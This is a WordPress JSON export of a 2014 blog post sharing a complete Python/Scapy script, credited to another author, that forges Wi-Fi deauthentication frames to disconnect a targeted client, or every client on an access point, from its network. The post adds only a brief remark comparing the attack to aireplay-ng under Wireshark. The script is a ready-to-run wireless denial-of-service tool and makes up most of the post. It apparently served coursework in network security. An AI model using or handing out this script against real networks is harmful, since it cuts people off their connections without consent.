{"id":200,"date":"2014-05-11T23:39:57","date_gmt":"2014-05-11T15:39:57","guid":{"rendered":"http:\/\/matnet.my\/blog\/?p=200"},"modified":"2014-09-11T09:10:03","modified_gmt":"2014-09-11T01:10:03","slug":"de-auth-packet-from-scapy","status":"publish","type":"post","link":"https:\/\/matnet.my\/blog\/2014\/05\/de-auth-packet-from-scapy\/","title":{"rendered":"De-Auth packet from Scapy"},"content":{"rendered":"

This script is from\u00a0Adam Maxwell (@<\/span>catalyst256<\/span>)<\/span><\/p>\n

#!\/usr\/bin\/env python<\/span><\/em>
\n# Scapy based wifi Deauth by @catalyst256<\/span><\/em>
\n# Change the client to FF:FF:FF:FF:FF:FF if you want a broadcasted deauth to all stations on the targeted Access Point<\/span><\/em><\/p>\n

import sys<\/span><\/em>
\nif len(sys.argv) != 5:<\/span><\/em>
\n print ‘Usage is .\/scapy-deauth.py interface bssid client count’<\/span><\/em>
\n print ‘Example – .\/scapy-deauth.py mon0 00:11:22:33:44:55 55:44:33:22:11:00 50’<\/span><\/em>
\n sys.exit(1)<\/span><\/em><\/p>\n

from scapy.all import *<\/span><\/em><\/p>\n

conf.iface = sys.argv[1] # The interface that you want to send packets out of, needs to be set to monitor mode<\/span><\/em>
\nbssid = sys.argv[2] # The BSSID of the Wireless Access Point you want to target<\/span><\/em>
\nclient = sys.argv[3] # The MAC address of the Client you want to kick off the Access Point<\/span><\/em>
\ncount = sys.argv[4] # The number of deauth packets you want to send<\/span><\/em><\/p>\n

conf.verb = 0<\/span><\/em><\/p>\n

packet = RadioTap()\/Dot11(type=0,subtype=12,addr1=client,
\n<\/span><\/em>addr2=bssid,addr3=bssid)\/Dot11Deauth(reason=7)<\/span><\/em><\/p>\n

for n in range(int(count)):<\/span><\/em>
\n sendp(packet)<\/span><\/em>
\n print ‘Deauth sent via: ‘ + conf.iface + ‘ to BSSID: ‘ + bssid + ‘ for Client: ‘ + client<\/span><\/em><\/p>\n

This script will send De-Auth packet to the target victims.<\/span><\/p>\n

I did run the Wireshark when the attacks are running, and the result is the same as attacks from the airplay-ng as in my previous post. But it’s more precise where the value of the packet send is same as receive to the victim. If you set it as “1” so the packet send to the victim also only “1” packet.<\/p>\n","protected":false},"excerpt":{"rendered":"

This script is from\u00a0Adam Maxwell (@catalyst256) #!\/usr\/bin\/env python # Scapy based wifi Deauth by @catalyst256 # Change the client to … More De-Auth packet from Scapy<\/span> →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,5],"tags":[],"class_list":["post-200","post","type-post","status-publish","format-standard","hentry","category-bsd-nix","category-cs778","standard"],"_links":{"self":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/comments?post=200"}],"version-history":[{"count":3,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/200\/revisions"}],"predecessor-version":[{"id":210,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/200\/revisions\/210"}],"wp:attachment":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/media?parent=200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/categories?post=200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/tags?post=200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}